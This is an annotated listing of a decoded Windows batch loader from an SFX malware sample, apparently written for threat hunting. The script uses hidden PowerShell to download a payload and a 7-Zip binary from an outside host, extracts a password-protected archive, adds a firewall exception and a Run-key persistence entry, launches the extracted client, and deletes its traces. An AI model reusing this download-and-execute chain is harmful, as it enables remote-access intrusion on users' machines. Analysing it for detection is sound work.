2019-02-24-decoded-batch-from-sfx-signed-loader.vk
| // decoded batch script loader from 73ca5dd6d49b4c296ee1304aaac2e5fde01156800b538354fd27366df5b9323f | |
| // ref -> | |
| // NOTE(review): the 64-hex value above has the length of a SHA-256 digest; presumably the hash of the SFX sample named in the file title - confirm. | |
| // NOTE(review): this is a decoded/rendered listing, not a byte-faithful copy. Paths read "APPDATA" with no percent signs, | |
| // the .NET class name contains "http://" and a space, and the last line reads "del 0". These look like decoding or | |
| // rendering artifacts, so build detections on the behaviours annotated below rather than on these exact strings. | |
| // Early exit when new.bin is already present. Nothing in this listing creates that file, so its origin is unknown here | |
| // (possibly an already-installed marker - confirm against the archive contents). | |
| if exist "APPDATA\new.bin" goto END | |
| // Six echo requests to localhost; the output is not used, so this is presumably just a delay. | |
| ping localhost -n 6 | |
| // Download 1: PowerShell with the profile skipped, a hidden window and execution policy bypassed. A WebClient with the | |
| // User-Agent header set to 'Command' saves the first URL as 7za.exe. Hunting pivots: this flag combination on a | |
| // PowerShell command line, the fixed User-Agent value, and a .php URL whose response is written to disk as an .exe. | |
| powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass $KRIIR = New-Object http://System.Net .WebClient; $KRIIR.Headers['User-Agent'] = 'Command'; $KRIIR.downloadfile('http://frameupds[.info/rwrw66/2222z.php','APPDATA\7za.exe'); | |
| // Download 2: same pattern and User-Agent, second URL on the same host, saved as 25520.7z. | |
| powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass $KRIIR = New-Object http://System.Net .WebClient; $KRIIR.Headers['User-Agent'] = 'Command'; $KRIIR.downloadfile('http://frameupds[.info/rwrw66/1111z.php','APPDATA\25520.7z'); | |
| // Abort if the first download did not land on disk. | |
| if not exist "APPDATA\7za.exe" goto END | |
| cd "APPDATA" | |
| // 7za "x" extracts with full paths; -p passes the archive password on the command line, -y answers yes to all prompts, | |
| // -o sets the output directory. A password-protected archive hides its contents from in-transit content inspection, | |
| // but the password is visible in process command-line logging. | |
| "APPDATA\7za.exe" x -pyoiyigne -y "APPDATA\25520.7z" -o"APPDATA" | |
| // Abort unless extraction produced home32\client32.exe. | |
| // NOTE(review): client32.exe is also the file name of the NetSupport Manager client - verify the extracted binary | |
| // (hash, signature) before attributing. | |
| if not exist "APPDATA\home32\client32.exe" goto END | |
| // Adds an allowed-program firewall exception named MsiWebKit for the extracted binary, using the legacy | |
| // "netsh firewall" context. | |
| netsh firewall add allowedprogram "APPDATA\home32\client32.exe" MsiWebKit ENABLE | |
| // Persistence: per-user Run value "MsiWebKit" pointing at client32.exe; /f overwrites an existing value without | |
| // prompting. The value name matches the firewall rule name above, which makes the pair a useful correlation point. | |
| reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /f /v "MsiWebKit" /t REG_SZ /d "APPDATA\home32\client32.exe" | |
| // One more ping (output unused), then the extracted binary is launched. | |
| ping localhost -n 1 | |
| start APPDATA\home32\client32.exe | |
| // Cleanup: force-deletes (/f) and quietly (/q) removes the two downloaded files. The extracted home32 files are not | |
| // deleted here, so they remain available for collection. | |
| del /f /q "APPDATA\25520.7z" | |
| del /f /q "APPDATA\7za.exe" | |
| // Every abort path above jumps here. "del 0" presumably was a self-delete of the running script before decoding - | |
| // confirm against the original sample. | |
| :END | |
| del 0 |